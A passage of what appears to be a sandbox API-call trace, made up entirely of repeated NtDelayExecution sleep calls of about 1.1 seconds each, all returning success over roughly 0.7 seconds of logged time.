(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.747] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.937] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0129.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.123] NtDelayExecution 